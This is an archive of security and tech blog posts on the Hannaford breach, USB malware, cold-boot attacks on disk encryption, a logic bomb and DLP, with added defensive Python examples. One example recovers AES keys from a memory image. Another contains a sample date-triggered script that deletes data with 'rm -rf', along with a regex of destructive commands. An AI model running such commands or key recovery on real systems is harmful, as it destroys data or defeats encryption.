The Fulcrum
As any Hannaford exec will tell you, the last place you want to secure is the first place hackers will target. As the cliché goes - a chain is only as strong...
In this case, although details are quite nebulous, it appears that malware running on internal servers intercepted card data as the cards were swiped: the POS terminals sent the data to the processing servers in plaintext and it was encrypted only after it arrived, so anything snooping in the middle could read the entire card record. The malware then simply shipped the numbers off to the hackers.
Really simple operation, but how did the malware get inside the internal servers? There are a few ways:
a. Someone used it to surf the 'Net, and probably downloaded it by mistake
b. Someone planted it on purpose (inside job)
c. Hackers got in from outside and planted the program
The company will not really say what happened, so the possibility that it was an inside job is quite high.
Steps the company has taken to avoid such illegal interception include encrypting the data right at the POS, having IBM monitor the network for suspicious activities and so on. This, thus, is another case of bolting the barn...although it is a sure deterrent to hackers planning the same method of stealing information in future.
The problem is that hackers will probably find a way around it; they always do. The PCI-DSS standard (see one of my previous blogs) requires stored cardholder data to be encrypted and transmissions over open, public networks to be encrypted, but it says nothing about traffic on the internal network between the POS terminals and the processing servers, and that gap is exactly where this attack lived.
Further, as the article in the link notes (and it is so true anyway), retailers depend heavily on their software vendors to update and patch their software, fix vulnerabilities, and overall make sure their product is not a gateway for hackers to drill into the enterprise and steal information.
One critical step would be to monitor INTERNAL traffic: always know who accesses the sensitive servers, enforce a strict ACL, and inspect ALL packets that leave those servers, especially those that break known patterns/signatures.
Doing extensive background checks on staff that must have access to these machines should be mandatory, and any unauthorized attempt to peek at the database or perform any kind of illegal operation should result in immediate termination, no exceptions. Quite obviously (as before in my earlier blogs) I am not advocating tyranny at the workplace, just prudence/caution/curiosity - and lots of it.
Hacking is done by humans - not machines or software, although they're indispensable in meeting their nefarious goals. The instigator is still a living, breathing human; so any security plan that mindlessly targets malware, viruses, worms, trojans etc without taking into account the human element (especially employees and also the psychological aspects of hacking/hackers) is doomed to fail.
For most large corporations that deal in data (finance, medicine, retail etc) there is nothing more horrific than a panicky call in the middle of the night from the sys admin. Don't let it happen to you - tighten your network; encrypt; monitor; adjust; implement; monitor.
Many employees treat lunch-time as a somewhat sadistic date with their computers - so that means plugging in various devices to their hapless desktop/notepad and torturing it with downloads of firmware upgrades, content, and syncing up mail/contacts etc. Not an issue per se, of course, and in fact this may increase productivity by making employees feel more 'at home' and comfortable at their workplace - as long as the actions do not constitute a violation of corporate policies, needless to say.
However, the risk is that some of these devices, which you'd expect to be 'pristine' and 'untouched', may have a nasty surprise in store for you (and for the IT team that must clean up the gory mess).
http://ap.google.com/article/ALeqM5j5sV-97QAoIse_DNzmQ6bD6oKXJwD8VCQIK80
It appears that many of these problems originate in devices manufactured in - where else? - China, where a careless tester may be plugging in these mini-computers to their stations for a final validation step, and inadvertently transferring the evil payload in the process.
Where this could be a REAL threat to a country's security is when this corruption happens DELIBERATELY, with malicious intent. So, imagine a defense dept official plugging in his/her child's iPod to their office laptop to download music or troubleshoot - and WHOOP - you got a password stealer installed stealthily. You can imagine the rest.
I've previously noted on this blog the risks of USB ports and CD/floppy drives on sensitive computers. Just glue them up if there's no need for them to be available. I'm not about to preach on the physical aspect of a company's security policy, but having steel doors is not enough. And for those that think AV solutions are the panacea for such problems, please note that some of these miserable little programs DISABLE the AV so no alarms are raised.
Happy listening!
_____
For those that consider disk encryption to be the ultimate tool in fending off hackers and data thieves, a short video should be a strong wake-up call.
Watch this, and be fascinated (maybe with horror):
http://www.youtube.com/watch?v=JDaicPIgn9U
Princeton researchers have found a couple of ways to get around BitLocker etc. I won't bore you with the details - just read this rather informative article
http://www.news.com/8301-13578_3-9876060-38.html?tag=nefd.lede
What's surprising is the EASE with which all the security boundaries were crossed (smashed, actually) and the data retrieved. When a company promises that hard disk encryption will save you from lost data because the thief won't be able to get to your information, they're only half right. If your computer was ON, in sleep mode or sitting at a screensaver lock, the key is still in RAM: the thief can harvest the memory and simply look for it.
The best way is to power down your computer (a real shutdown or hibernate, not sleep, which keeps the key in RAM) and make sure it's off for at least 4-5 minutes before you walk away from it; otherwise it's way too easy to get to the innards.
The weakness lies in the fact that the encryption key is stored in RAM - quite obvious, because data needs to be en/decrypted on the fly and the only way to do that efficiently is to keep the key in memory. DRAM chips are supposed to lose their contents at power-off, but that's not quite true: without refresh they hold their contents for seconds to minutes at room temperature, and for 10 MINUTES or more once they've been cooled. That's a lot of time.
So once they have the computer, the hackers simply cool the memory modules with an inverted can of duster spray (which takes them down to around -50 degrees and slows the decay dramatically), pull them, plug them into their own machine, copy the contents over and look for the key. Simple.
Or, they can boot from an external disk and run a program that'll dump the contents of memory and simultaneously retrieve the key as well.
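Looking for the key in a memory dump is easier than it sounds, because an AES key never sits in RAM alone: the expanded key schedule (176 bytes for AES-128, derived deterministically from the 16-byte key) is normally stored right next to it, and that redundancy is what lets a scanner pick the key out of megabytes of noise even after a few bits have decayed. The Python below is an added example, not the Princeton team's tool and not code from the article: it builds a constructed 4 KB "memory image", plants a key schedule in it with a few bits flipped to mimic decay, and recovers the key and its offset by testing every 16-byte window. The image, the offset and the key (the FIPS-197 example key) are all made up for the example, and it only tolerates errors in the derived round keys; the real tools also reconstruct keys whose own bytes have decayed.

```python
import random


def _build_sbox():
    """Derive the AES S-box (inverse in GF(2^8) plus the affine map) by walking
    the field with generator 3, so no 256-entry table has to be typed in."""
    sbox = [0] * 256
    p = q = 1                       # invariant: p * q == 1 in GF(2^8)
    while True:
        p ^= ((p << 1) & 0xFF) ^ (0x1B if p & 0x80 else 0)   # p *= 3
        q ^= q << 1                                           # q /= 3
        q ^= q << 2
        q ^= q << 4
        q &= 0xFF
        if q & 0x80:
            q ^= 0x09
        x = q ^ (q << 1) ^ (q << 2) ^ (q << 3) ^ (q << 4)     # sum of rotations
        sbox[p] = (x ^ (x >> 8) ^ 0x63) & 0xFF
        if p == 1:
            break
    sbox[0] = 0x63                  # zero has no inverse; affine map of 0
    return sbox


SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def expand_key(key):
    """AES-128 key schedule (FIPS-197 5.2): 16-byte key -> 176 bytes of round keys."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = t[1:] + t[:1]                  # RotWord
            t = [SBOX[b] for b in t]           # SubWord
            t[0] ^= RCON[i // 4 - 1]
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return bytes(b for word in w for b in word)


def bit_errors(a, b):
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def find_aes128_keys(image, max_bit_errors=0):
    """Slide a 16-byte window over the dump; a window is a key if expanding it
    reproduces the following 160 bytes within max_bit_errors flipped bits."""
    hits = []
    for off in range(len(image) - 176 + 1):
        cand = bytes(image[off:off + 16])
        errs = bit_errors(expand_key(cand)[16:], image[off + 16:off + 176])
        if errs <= max_bit_errors:
            hits.append((off, cand, errs))
    return hits


# Constructed memory image: random filler with one key schedule planted in it.
KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")   # FIPS-197 example key
KEY_OFFSET = 1000


def make_sample_image(flip_bits=3, size=4096):
    rng = random.Random(1)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    buf[KEY_OFFSET:KEY_OFFSET + 176] = expand_key(KEY)
    for _ in range(flip_bits):          # mimic decay in the derived round keys
        pos = KEY_OFFSET + 16 + rng.randrange(160)
        buf[pos] ^= 1 << rng.randrange(8)
    return bytes(buf)


if __name__ == "__main__":
    for off, key, errs in find_aes128_keys(make_sample_image(), max_bit_errors=3):
        print(f"AES-128 key at offset {off}: {key.hex()} ({errs} decayed bits)")
```

The schedule check is so selective that random data essentially never passes it, which is why a scanner can afford to test every byte offset of a multi-gigabyte dump and tolerate a handful of decayed bits; the countermeasure side is equally simple to state, since a key that is not in RAM (machine fully off, or hibernated with the key wiped) cannot be found this way.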
What does this mean for all those people that believed disk encryption was the cure-all? Well, it's still better to have this protection than not to have it, but don't leave your computer on (or asleep) if you must leave it unattended, even for a minute. And for any reason whatsoever, don't lose track of it in the first place.
The article discusses some countermeasures, but the IT organization that was sold on this technology now is probably getting bombarded with all sorts of questions and concerns, and justifiably so.
The only safe way to prevent data theft is to prevent the theft of the computer itself.
The recent unsolicited bid from MS for YAHOO was not very surprising. Considering that Y has been ailing for some time now - with declining ad revenues and search statistics, along with a somewhat slow-and-bloated feel to the entire company, someone HAD to do something. MS decided to be that someone.
How much sense does it make? Not much. Not much at all. MS is known for its aggressive marketing, product growth, and pushing strongly into areas that have already been cleared for it by others - and very often overrunning the precursors in the process. However, it is not very much known for innovation.
Y, on the other hand, was one of the first true innovators on the Web, bringing a 'directory' approach to search. However, as the Web grew exponentially, people had little time or patience to look through subdirectories and such -- they just wanted the ability to type in something and see something useful come up quickly.
Google satisfied that need splendidly. Its simple, understated interface with just three or four links, and two simple buttons, did it all. Magic, nearly every time. Witness its torrid revenue growth and the merciless streak of profitability, a portion of which comes at the cost of others, mostly Y and MSN (which is, in my opinion, the most anemic of all search engines).
Others somehow stumbled along, while G, with the incredible muscle of its finances and the fantastic brains behind it all, simply left everyone dazed (and tottering).
Little wonder that it cried foul at MS's offer; and even less surprising that it offered a 'helping' hand to Y. But I think secretly G wants MS to get into Y the way a dying man gets trapped in quicksand. Y just announced it would lay off 1000 people worldwide; it has shut down its Photo division, and probably will shutter many others that are simply not contributing to the bottom line. That leaves a WHOLE lot of disgruntled, and in many cases, very talented people just waiting to jump ship.
Enter MS - to hasten the fall, and enter G - to welcome the jumpers.
Y is decaying; I have no doubt about it. Jerry or Terry - same results. Its
Further, while Y has a startup-type outlook, MS is on the other side of the Net divide: Stodgy, self-important, dull, and a penchant for monopolistic tendencies. Therefore, a clash of the cultures is definitely not to be ruled out.
Overall, not a very rosy picture there.
However, as my wife will occasionally point out, not all of my notions are accurate to the last detail all the time. Besides, every now and then I'll come up with a non sequitur or two: Because both MS and Y are competition to G, combined they'll surely kill G.
Yeah, right.
Anyway, the mise-en-scene has been set - let's get the popcorn and watch the fun unfold!
Further to that, the govt, which seems to have absolutely no take on such issues, needs to get off its lazy behind and do something meaningful, like legislating strong penalties for careless and negligent organizations.
In a series of announcements that could pressure VMWare stock, MS made it clear that it's going to go after virtualization along multiple channels, and with great determination. Their intent to purchase Calista, a desktop virtualization presentation product, falls in line with what they hope to do with the technology, and where they want to apply it.
One must remember that desktop virtualization is still new and hasn't really become popular yet, but should take off like a rocket once corporate types figure out it's cheaper, easier, more secure, and more reliable to push out a preformed virtual image to employees' machines than any other solution.
Now that Windows Server 2008 will have Hyper-V built in - on the same OS layer that they sell so much of - the teaming up with Citrix (which purchased XenSource) will further consolidate their position as highly committed to the VM platform. VMWare must now fight back with new relationships/partners and technologies that will improve the speed, response, security, and performance of their products in general. Although they have a commanding lead in the market and are seen as the leaders, MS thrives on starting late, catching up, and then overtaking. So, despite any delay or kludgy/buggy interfaces that one may encounter in MS' first offering, you simply can't write them off. They have the money, the resources, and the doggedness to go after *anything* - however dumb a move it *may* seem to outsiders.
To be sure, the OS is still their main source of revenue; however, they'll take anything they can get in the fresh, still-quite-untested market of VMs. No question it's a new source of revenue (and customers), and it's also one that's bound to grow very fast, and by large amounts. The 'green' message behind VMs helps a lot, plus space and time savings. The Citrix partnership could hold back those companies that want to move from MS to Linux and keep them safely ensconced in the MS fold.
Although analysts seem to be confident about VMWare's current strategy and product direction, they'd do well to keep looking over their shoulders.
All in all, it's a VERY positive announcement from MS, but let's hope they don't come up with another Zune (if they did, then with a little stretching one could call VMWare the Apple of VMs).
_____
Continuing in the grand tradition of using bad puns as titles, we look at the weird case of Lin Yung-Hsun, a Sys Admin, who in his great wisdom thought it fit to plant a logic bomb (http://en.wikipedia.org/wiki/Logic_bomb) because he was nervous about an upcoming corporate restructuring (that could result in his getting laid-off).
You can read more about this sadly misguided person's story here:
http://www.informationweek.com/news/showArticle.jhtml?articleID=205601393
The ultimate irony is that he was kept while other SAs were shown the door.
In previous postings I've mentioned that the biggest threats often come from insiders - disgruntled employees, saboteurs that get employment in the target company so they can perform destructive actions, corrupt workers and so on.
Obviously the idea is not that one should distrust one's workers - on the contrary, one should trust them completely, while still taking protective actions: routine review of all admin commands/actions, sweeping the disks (and the scheduled jobs) of critical servers for anything out of place, and maybe even having a trusted party check important systems for signs of unauthorized or unacceptable activity.
While there are pretty good tools to prevent virus/DoS/hacking attacks, none that I know of protect against such deviously simple yet hard-to-find attacks. Unless AV software can start incorporating intelligence (signatures) of destructive behavior it won't be simple/possible/easy to stop such people.
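The "routine scans of all admin commands/actions" above can be made concrete for the simplest kind of logic bomb: a scheduled job dressed up as maintenance that does nothing until one particular calendar day and then runs something destructive. The Python below is an added example, not code from the article and not anything the company in the story used. It parses a constructed root crontab, looks at the scripts the jobs call, and reports only jobs that combine a destructive command with either a one-shot schedule (fixed day and month) or a script that compares today's date to a hard-coded day. The crontab, the scripts and the paths are made up, and the patterns are heuristics: they miss bombs hidden in compiled code or triggered by something other than the date, and they flag legitimate one-off jobs, which a human then reviews.

```python
import re

# Constructed root crontab: three ordinary jobs and one that only fires on 4 April.
SAMPLE_CRONTAB = """\
# nightly backup, weekly log cleanup, 'maintenance', monthly rotation
0 2 * * * /usr/local/bin/backup.sh
30 3 * * 0 /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete
0 0 4 4 * /opt/admin/maint.sh
15 4 1 * * /usr/sbin/logrotate /etc/logrotate.conf
"""

# Constructed contents of the scripts the crontab references.
SAMPLE_SCRIPTS = {
    "/usr/local/bin/backup.sh": "#!/bin/sh\ntar czf /backup/app-$(date +%F).tgz /var/lib/app\n",
    "/opt/admin/maint.sh": (
        "#!/bin/sh\n"
        "# looks like housekeeping, but the payload is gated on one calendar day\n"
        'if [ "$(date +%Y%m%d)" = "20080404" ]; then\n'
        "  rm -rf /var/lib/app/* /backup/*\n"
        "fi\n"
    ),
}

# Commands that destroy data: recursive/forced rm, mkfs, dd onto a device, shred,
# DROP TABLE/DATABASE, find ... -delete.
DESTRUCTIVE = re.compile(
    r"\brm\s+-\w*[rf]\w*\s|\bmkfs\b|\bdd\s+.*\bof=/dev/|\bshred\b"
    r"|\bDROP\s+(?:TABLE|DATABASE)\b|\s-delete\b",
    re.I,
)
# A call to date followed (anywhere later) by an 8-digit YYYYMMDD literal.
DATE_GATE = re.compile(r"\bdate\b.*?\b(?:19|20)\d{6}\b", re.S)


def parse_crontab(text):
    """Return the five schedule fields plus command for each real crontab line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        minute, hour, dom, month, dow, command = fields
        entries.append({"minute": minute, "hour": hour, "dom": dom,
                        "month": month, "dow": dow, "command": command})
    return entries


def is_one_shot(entry):
    """Fixed day-of-month AND fixed month: the job runs on one calendar date a year."""
    return entry["dom"].isdigit() and entry["month"].isdigit()


def scan(crontab_text, scripts):
    """Report (script path, reasons) for jobs that are destructive AND time-gated."""
    findings = []
    for entry in parse_crontab(crontab_text):
        path = entry["command"].split()[0]
        body = scripts.get(path, "")          # inline commands have no script body
        if not DESTRUCTIVE.search(entry["command"] + "\n" + body):
            continue                          # destructive-looking but recurring jobs pass
        reasons = []
        if is_one_shot(entry):
            reasons.append(f"one-shot schedule (day {entry['dom']}, month {entry['month']})")
        if DATE_GATE.search(body):
            reasons.append("script compares today's date against a hard-coded day")
        if reasons:
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_CRONTAB, SAMPLE_SCRIPTS):
        print(path)
        for r in reasons:
            print("  -", r)
```

Run against the sample, only /opt/admin/maint.sh is reported, with both reasons; the weekly `find ... -delete` job is destructive but recurring, so it is left alone. In practice the same scan belongs on at jobs, systemd timers and the admin shell histories, and the output should go to someone other than the admins who own the boxes.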
_____
I'd noted in a blog post on Nov 7 that DELL might purchase a storage hardware or technology within the next 3-6 months. I was right, of course, but didn't realize how soon I'd be proven right. The company is 'The Networked Storage Company' and the founder is a former EMC UK executive.
Their model is brilliant - simple yet very effective. No question that DELL saw the gem and grabbed it. The only thing is, their website (TNWSC.com) states that they are 'fiercely independent' in the sense that they do not owe allegiance to any one vendor. However, with DELL now buying them out, how does that change things?
From their website's FAQ section:
Check out their FAQ here: http://tnwsc.com/faq's.html (I'm not a fan of apostrophes where they DON'T belong, especially in plurals).
TNWSC do not recommend solutions, yes, and they have a methodology called 'Point of Proof' which DELL is going to market, but still the idea of a previously independent entity flaunting its disinterest now getting bought out by a storage vendor is somehow a bit odd, although I'd think it will make no difference in how TNWSC will continue to work or how DELL will treat its old (and new) customers -- because ultimately credibility (and honesty) is everything. As long as they continue to save their clients tons of money and guide them through the labyrinth of storage acronyms and technologies, who cares! I look forward to seeing how DELL exploits this to-be-hot-soon market (that of IT storage consulting). Companies have invested millions (and billions) of dollars in their complex IT (storage) infrastructures, so if they want to see returns who can blame them! As an analogy I'd say such firms are like the patient advocacy firms - they promise results for your investment; no more no less. See http://en.wikipedia.org/wiki/Patient_advocacy: another hot trend considering healthcare costs and a seeming apathy towards the very people that fund the system - the patients.
****
Another curious thing I read recently related to IBM's release of the semantic search (for email), available on their AlphaWorks site (http://www.almaden.ibm.com/cs/projects/avatar/)
The first thing that'll come to anyone's mind is Google Desktop Search (GDS) - a very powerful and unimaginably quick search tool that I used for a long time before the index became a bit much for the disk (I have a pathetic 12 GB disk). Now, if you had a 100+GB disk with a lot of documents/email etc you'd really want GDS. GDS however does a (I think) strictly string-search approach - no 'intelligence' or 'rule-based search'.
The new tool from the Avatar research team does a lot of similar things -- it mines unstructured information and renders it searchable (albeit in an 'intelligent' fashion -- heuristics, really; so watch out for cognitive biases). So what's new? I know that Stratify (used to be known as Purple Yogi) used to do the same. I think Stratify was funded by In-Q-Tel, apparently the funding arm of the CIA.
The problem statement posed by the researchers/inventors is nothing new - there's a whole lot of information that's just lying there, waiting to be found, associations waiting to be made, text waiting to be indexed. To make the process of digging through the dirt cleaner, quicker, easier, and accessible is an unenviable task. Imagine a corporate website that has individual blogs/mini websites/documents all over the place, containing sensitive, important, and critical material that's probably needed by many others (or they don't know that they need it). An index-and-search tool such as Google's SearchAppliance would be a great thing to have, but only to search for actual strings (again, I think they simply index and search - corrections from the knowledgeable welcome).
With IBM's OmniFind (Omni is overused to the point of being a cliche' now) you could type in, say, 'requirements gathering' and it will search even for something like 'how to create great requirements' or 'the art of successful project management' etc - you get the picture. I'd like to repeat that this is not a new area, but to my knowledge it's also not an area that's been developed very well in the consumer area (including corporate customers). And therefore such initiatives are most welcome as they'll help people do better searches and save a whole lot of time in finding the things they're looking for -- so they can be more productive and efficient.
Not to mention they'll REALLY help trial lawyers in e-Discovery: remember that all those rules you'll be punching in, and the associations and relationships you create, could become evidence - not just the results but the RULES AND THE INTENTION(S) behind the rules as well.
Anyway, I'll give it a try and update this blog sometime next month with my findings on how good it is.
_____
Nothing much new here, but just to underscore the critical nature of education, enforcement, and effective action:
http://www.informationweek.com/blog/main/archives/2007/12/we_need_to_talk.html
John Soat talks about how end users take untold liberties with IT policies and probably take them as suggestions rather than mandatory rules. It's quite complex as to why this happens -- it's quite clear that they probably know what they're doing is wrong, but just not *so* wrong that they shouldn't do it.
See, the issue is that many of these areas are left in the gray part of 'can do or must not do' policies. And worse, I'm willing to bet that 99% of employees have NO IDEA what constitutes proper 'secure' behavior and what constitutes a violation of company policy and thus their employment contract.
Along with continual education, the only other way to make sure that corporate data doesn't leave the network is to use software that inspects the packets leaving it and checks that they carry nothing sensitive. To do that you'd have to get one of those 'anti leak' DLP products (like what Vontu/Symantec does) and establish clear demarcations between acceptable and non-acceptable information leaving the network.
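Two of the controls on this page - inspecting the packets that leave a card-processing server (the Hannaford post) and the 'anti leak' DLP idea here - come down to the same check: is this flow going somewhere it should, and does its payload carry something it shouldn't? The Python below is an added illustration, not the Vontu/Symantec product and not anything Hannaford deployed. It runs a Luhn check over every 13-19 digit run in a payload (the way DLP engines screen for card numbers, so that order numbers and ticket IDs don't trip it) and compares the destination against an egress allowlist for the server. The allowlist, the three flows and the card number (a well-known test number) are all constructed for the example.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed allowlist: the store LAN and one payment-processor gateway are the
# only places the POS processing server should ever send traffic.
EGRESS_ALLOWLIST = [ip_network("10.20.0.0/16"), ip_network("203.0.113.10/32")]

# 13-19 digits, optionally separated by spaces or dashes, not part of a longer digit run.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits):
    """Luhn mod-10 check: doubles every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pans(payload):
    """Return the Luhn-valid card-number-shaped digit runs in a text payload."""
    found = []
    for m in PAN_CANDIDATE.finditer(payload):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(digits)
    return found


def mask(pan):
    """Keep first six and last four digits, as on a receipt, for the alert text."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def inspect_flow(flow):
    """Reasons a single outbound flow {src, dst, payload} should be alerted on."""
    reasons = []
    dst = ip_address(flow["dst"])
    if not any(dst in net for net in EGRESS_ALLOWLIST):
        reasons.append(f"destination {dst} not in egress allowlist")
    pans = find_pans(flow["payload"])
    if pans:
        reasons.append(f"{len(pans)} Luhn-valid PAN(s) in cleartext, e.g. {mask(pans[0])}")
    return reasons


def scan_flows(flows):
    """Return (index, reasons) for every flow that produced at least one reason."""
    results = []
    for i, flow in enumerate(flows):
        reasons = inspect_flow(flow)
        if reasons:
            results.append((i, reasons))
    return results


# Constructed egress from the processing server 10.20.1.5: a normal settlement
# message, a track-2 style record going to an outside host, and a receipt lookup
# whose 13-digit ticket number is not Luhn-valid.
SAMPLE_FLOWS = [
    {"src": "10.20.1.5", "dst": "10.20.5.7",
     "payload": "settlement batch 4471 accepted"},
    {"src": "10.20.1.5", "dst": "198.51.100.23",
     "payload": "swipe: 4111 1111 1111 1111=0912101 name=DOE/JOHN"},
    {"src": "10.20.1.5", "dst": "203.0.113.10",
     "payload": "receipt lookup ticket 1234567890123 status=ok"},
]

if __name__ == "__main__":
    for i, reasons in scan_flows(SAMPLE_FLOWS):
        print(f"flow {i} -> {SAMPLE_FLOWS[i]['dst']}:")
        for r in reasons:
            print("  -", r)
```

Only the second flow is reported, for both reasons; the ticket number in the third is the same length as a card number but fails Luhn and stays quiet. Two caveats a practitioner would add: an attacker who encrypts or encodes the stolen data before exfiltration defeats the content check, which is why the destination allowlist (and volume baselining) matters more than the regex, and the alert text must carry a masked PAN so the monitoring system does not itself become a store of cleartext card data.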
Any practical ideas from readers?
_____
I call it Sneakcon - they call it Beacon, not much difference there when you find out that affiliated websites (affiliated with FB) - were sending your information to your friends on FB despite your having LOGGED out of their site.
How did they figure this out? Well, simple - network monitoring via Wireshark (I saw it on the blog of the original CA researcher that found this activity). The idea behind Beacon was to send out info on your online habits to your friends on the site. However, soon people started complaining that the surprise element behind their surprise gifts was ruined because the intended recipient got to know of the purchase. Well, that's fine, and you can turn it off, but not even when you're logged off?? Whoa - that's a serious breach of trust in my opinion.
As a reference, see this:
http://www.cio-today.com/story.xhtml?story_id=010000ZKE6WS
So, they track non-users as well - except that they will discard the data if it did not include an FB cookie saying it's an FB user - and then even if you were an FB user and even if you'd opted out of the 44 websites that work with FB, your info will STILL be sent except they won't process it (because you'd opted out). I don't think this is a good idea. Doesn't matter if you throw away the information or not: if I'm not an FB user you have NO RIGHT to my data. And who's to say the data is being REALLY thrown out? Who audits that?
You should know that you have to opt out ONE BY ONE - not all of the sites simultaneously. Couldn't be more painful than that. And considering how popular the site is, what if hundreds of companies choose to join the program. You'd have to constantly change your preferences to avoid opting in. It should be the reverse - unless you chose to opt in, nothing about you should be known to anyone.
This is why they are in very serious need of a customer privacy advocate, someone who can dispassionately identify such issues and guide the misguided person that chose to implement it so that people don't start abandoning the site or decide against joining it. I'm quite sure that many people have decided not to join FB after this fiasco. I know I won't.
_____